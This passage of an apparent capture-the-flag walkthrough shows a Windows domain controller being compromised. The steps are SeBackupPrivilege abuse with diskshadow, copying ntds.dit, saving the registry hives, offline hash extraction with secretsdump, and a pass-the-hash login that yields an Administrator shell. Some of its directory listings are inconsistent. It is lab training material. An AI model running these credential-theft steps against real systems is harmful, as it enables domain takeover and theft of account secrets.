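    return findings

# Constructed sample, trimmed from the svc_backup `whoami /all` output above.
SAMPLE_WHOAMI = """\
Group Name                                 Type             SID          Attributes
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_WHOAMI
    for finding in escalation_paths(text):
        print(finding)
```

Save `whoami /all` output to a file on the attacking machine and pass it as the first argument; with no argument it runs on the embedded sample.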

GETTING ROOT ACCESS

In brief: svc_backup is in Backup Operators, so it holds SeBackupPrivilege. We use diskshadow to create a Volume Shadow Copy of C: and expose it as a drive letter, because ntds.dit on the live volume is locked by the directory service. From the snapshot we copy ntds.dit out using SeBackupPrivilege, which bypasses the file's ACL. The hashes inside ntds.dit are encrypted with a key derived from the boot key in the SYSTEM hive, so we also save HKLM\SYSTEM with reg save. Impacket's secretsdump.py can then decrypt everything offline, including the Administrator NT hash. (robocopy /b, whose backup mode opens files with SeBackupPrivilege, is a built-in alternative to the SeBackupPrivilege DLLs used below.)

DISKSHADOW SCRIPT (uploaded as diskexploit.txt) THAT SNAPSHOTS THE C: VOLUME AND EXPOSES IT AS G:

    set context persistent nowriters#
    add volume C: alias new1#
    create#
    expose %new1% g:#

The trailing # on each line is deliberate: diskshadow expects Windows (CRLF) line endings, and with a file written on Linux it tends to swallow the last character of each line, so the # is a sacrificial padding character (running unix2dos on the file is the other fix). The alias name is arbitrary; it is the variable that the create step fills with the new shadow copy ID.

    *Evil-WinRM* PS C:\Users\svc_backup\Desktop> cd ../../../
    *Evil-WinRM* PS C:\> mkdir temp


        Directory: C:\


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    d-----        7/10/2020   4:07 PM                temp


    *Evil-WinRM* PS C:\> cd temp
    *Evil-WinRM* PS C:\temp> upload diskexploit.txt
    Info: Uploading diskexploit.txt to C:\temp\diskexploit.txt

                                                                
    Data: 112 bytes of 112 bytes copied

    Info: Upload successful!

    *Evil-WinRM* PS C:\temp> ls


        Directory: C:\temp


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    -a----        7/10/2020   4:08 PM             86 diskexploit.txt


    *Evil-WinRM* PS C:\temp> diskshadow /s diskexploit.txt
    Microsoft DiskShadow version 1.0
    Copyright (C) 2013 Microsoft Corporation
    On computer:  DC01,  7/10/2020 4:09:11 PM

    -> set context persistent nowriters
    -> add volume C: alias new1
    -> create
    Alias new1 for shadow ID {6067a30e-a018-4980-b41f-7c734e81b825} set as environment variable.
    Alias VSS_SHADOW_SET for shadow set ID {534f88ab-b505-4e7f-ab7e-5c545f423da1} set as environment variable.

    Querying all shadow copies with the shadow copy set ID {534f88ab-b505-4e7f-ab7e-5c545f423da1}

        * Shadow copy ID = {6067a30e-a018-4980-b41f-7c734e81b825}		%new1%
            - Shadow copy set: {534f88ab-b505-4e7f-ab7e-5c545f423da1}	%VSS_SHADOW_SET%
            - Original count of shadow copies = 1
            - Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
            - Creation time: 7/10/2020 4:09:12 PM
            - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3
            - Originating machine: DC01.BLACKFIELD.local
            - Service machine: DC01.BLACKFIELD.local
            - Not exposed
            - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
            - Attributes:  No_Auto_Release Persistent No_Writers Differential

    Number of shadow copies listed: 1
    -> expose %new1% g:
    -> %new1% = {6067a30e-a018-4980-b41f-7c734e81b825}
    The shadow copy was successfully exposed as g:\.
    ->
    *Evil-WinRM* PS C:\temp> g:
    *Evil-WinRM* PS G:\> ls


        Directory: G:\


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    d-----        5/26/2020   5:38 PM                PerfLogs
    d-----         6/3/2020   9:47 AM                profiles
    d-r---        3/19/2020  11:08 AM                Program Files
    d-----         2/1/2020  11:05 AM                Program Files (x86)
    d-----        7/10/2020   4:08 PM                temp
    d-r---        2/23/2020   9:16 AM                Users
    d-----        5/28/2020   9:34 AM                Windows


    *Evil-WinRM* PS G:\> cd Windows
    *Evil-WinRM* PS G:\Windows> ls


        Directory: G:\Windows


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----

    <---->

    d-----        9/15/2018  12:19 AM                diagnostics
    d-----        9/15/2018   2:08 AM                DigitalLocker
    d---s-        9/15/2018  12:19 AM                Downloaded Program Files
    d-----        9/15/2018  12:19 AM                drivers
    d-----        9/15/2018   2:08 AM                en-US
    d-r-s-         9/6/2019   5:31 PM                Fonts
    d-----        9/15/2018  12:19 AM                Globalization
    d-----        9/15/2018   2:08 AM                Help
    d-----        9/15/2018  12:19 AM                IdentityCRL
    d-----        9/15/2018   2:08 AM                IME
    d-r---        2/28/2020   4:26 PM                ImmersiveControlPanel
    d-----        7/10/2020   9:41 AM                INF
    d-----        9/15/2018  12:19 AM                InputMethod
    d-----        9/15/2018  12:19 AM                L2Schemas
    d-----        9/15/2018  12:19 AM                LiveKernelReports
    d-----        5/26/2020   5:36 PM                Logs
    d-r-s-        9/15/2018  12:19 AM                media
    d-r---        7/10/2020   4:58 AM                Microsoft.NET
    d-----        9/15/2018  12:19 AM                Migration
    d-----        9/15/2018  12:19 AM                ModemLogs
    d-----        7/10/2020   4:47 AM                NTDS
    d-----        9/15/2018   2:09 AM                OCR
    d-r---        9/15/2018  12:19 AM                Offline Web Pages
    d-----         2/1/2020   7:55 PM                Panther

    <---->


    *Evil-WinRM* PS G:\Windows> cd NTDS
    *Evil-WinRM* PS G:\Windows\NTDS> ls


        Directory: G:\Windows\NTDS


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    -a----         6/6/2020   8:35 AM           8192 edb.chk
    -a----        7/10/2020   4:02 PM       10485760 edb.log
    -a----        2/23/2020   9:41 AM       10485760 edb00003.log
    -a----        2/23/2020   9:41 AM       10485760 edb00004.log
    -a----        2/23/2020   9:41 AM       10485760 edb00005.log
    -a----        2/23/2020   3:13 AM       10485760 edbres00001.jrs
    -a----        2/23/2020   3:13 AM       10485760 edbres00002.jrs
    -a----        2/23/2020   9:42 AM       10485760 edbtmp.log
    -a----        7/10/2020   4:47 AM       18874368 ntds.dit
    -a----        7/10/2020  11:18 AM          16384 ntds.jfm
    -a----        7/10/2020   4:47 AM         434176 temp.edb

    *Evil-WinRM* PS G:\Windows\NTDS> c:
    *Evil-WinRM* PS C:\temp> upload SeBackupPrivilegeUtils.dll
    Info: Uploading SeBackupPrivilegeUtils.dll to C:\temp\SeBackupPrivilegeUtils.dll

                                                                
    Data: 21844 bytes of 21844 bytes copied

    Info: Upload successful!

    *Evil-WinRM* PS C:\temp> upload SeBackupPrivilegeCmdLets.dll
    Info: Uploading SeBackupPrivilegeCmdLets.dll to C:\temp\SeBackupPrivilegeCmdLets.dll

                                                                
    Data: 16384 bytes of 16384 bytes copied

    Info: Upload successful!

    *Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeCmdLets.dll
    *Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeUtils.dll
    *Evil-WinRM* PS C:\temp> Copy-FileSebackupPrivilege g:\Windows\NTDS\ntds.dit C:\temp\ndts.dit
    *Evil-WinRM* PS C:\temp> ls


        Directory: C:\temp


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    -a----        7/10/2020   4:09 PM            610 2020-07-10_16-09-12_DC01.cab
    -a----        7/10/2020   4:08 PM             86 disk_shadow.txt
    -a----        7/10/2020   4:50 PM       18874368 ndts.dit
    -a----        7/10/2020   4:10 PM          45056 sam.hive
    -a----        7/10/2020   4:49 PM          12288 SeBackupPrivilegeCmdLets.dll
    -a----        7/10/2020   4:48 PM          16384 SeBackupPrivilegeUtils.dll
    -a----        7/10/2020   4:10 PM       17346560 system.hive



    *Evil-WinRM* PS G:\Windows\NTDS> reg save HKLM\SYSTEM c:\temp\system.hive
    The operation completed successfully.

    *Evil-WinRM* PS G:\Windows\NTDS> Reg save HKLM\SAM c:\temp\sam.hive
    The operation completed successfully.

    *Evil-WinRM* PS G:\Windows\NTDS> c:
    *Evil-WinRM* PS C:\temp> ls


        Directory: C:\temp


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    -a----        7/10/2020   4:09 PM            610 2020-07-10_16-09-12_DC01.cab
    -a----        7/10/2020   4:08 PM             86 diskexploit.txt
    -a----        7/10/2020   4:10 PM          45056 sam.hive
    -a----        7/10/2020   4:10 PM       17346560 system.hive

Now download the two files to the attacking machine with evil-winrm's download command (download C:\temp\ndts.dit ntds.dit and download C:\temp\system.hive system.hive; note the copy above saved the database under the misspelt name ndts.dit) and run secretsdump.py against them offline. The SAM hive is not needed for the domain accounts; it only holds the DC's local accounts.

    ┌─[root@liquid]─[~/Desktop/HTB/blackfield]
    └──╼ #python secretsdump.py -ntds ntds.dit -system system.hive local
    Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

    [*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393

The output has one line per account in the form user:rid:lmhash:nthash:::. The NT hash for Administrator is:

    184fb5e5178480be64824d4cd53b99ee

Passing that hash over WinRM gives an Administrator shell:

    ┌─[root@liquid]─[~/Desktop/HTB/blackfield]
    └──╼ #evil-winrm -u administrator -H 184fb5e5178480be64824d4cd53b99ee -i 10.10.10.192

    Evil-WinRM shell v2.3

    Info: Establishing connection to remote endpoint

    *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
    blackfield\administrator
    *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
    *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
    c4809e0a73899ca82249b1b973c8527e
    *Evil-WinRM* PS C:\Users\Administrator\Desktop> 

So This machine was all about ENUMERATION !!

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
